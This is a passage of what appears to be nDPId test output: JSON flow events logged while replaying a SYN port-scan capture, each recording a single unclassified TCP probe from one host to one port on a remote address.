{"proto":"Unknown","breed":"Unrated"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":841,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49155,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49157,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49157,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32772,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32772,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32773,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32773,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49156,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49157,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49157,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32773,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32773,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49158,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49158,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32774,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32774,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49159,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1001,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49158,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1001,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49158,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32775,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32775,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32774,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32774,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32775,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32775,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49160,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49159,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
